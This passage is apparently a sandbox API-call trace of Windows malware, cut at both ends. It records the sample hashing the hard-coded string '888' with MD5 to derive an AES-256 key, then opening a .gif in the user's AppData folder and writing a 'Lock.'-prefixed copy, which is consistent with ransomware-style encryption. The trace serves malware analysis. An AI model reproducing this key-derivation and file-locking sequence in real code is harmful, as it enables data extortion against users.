dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.964] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0112.964] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.965] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0113.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0113.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.005] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf5d8) returned 1 [0113.006] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0113.006] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0113.006] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.006] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.176] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.176] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa288, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.177] CryptCreateHash (in: hProv=0x9bf5d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.177] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.177] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.177] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa408, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0113.177] CryptHashData (hHash=0x9a4440, pbData=0x2a72698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0113.177] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.177] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.177] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.177] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa3f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0113.177] CryptDeriveKey (in: hProv=0x9bf5d8, Algid=0x6601, hBaseData=0x9a4440, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a47c0) returned 1 [0113.178] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.178] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0113.178] CryptDestroyHash (hHash=0x9a4440) returned 1 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0113.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0113.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/1px3r9YZM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\1px3r9yzm.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0113.179] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.179] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0113.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0113.180] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0113.180] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0113.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0113.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0113.180] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0113.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0113.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abf418 [0113.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0113.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0113.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.1px3r9YZM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.1px3r9yzm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0113.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0113.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0113.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0113.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0113.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0113.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0113.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0113.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cbc020 [0113.186] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0113.186] ReadFile (in: hFile=0x4ec, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0113.187] ReadFile (in: hFile=0x4ec, lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x3dfb, lpOverlapped=0x0) returned 1 [0113.187] ReadFile (in: hFile=0x4ec, 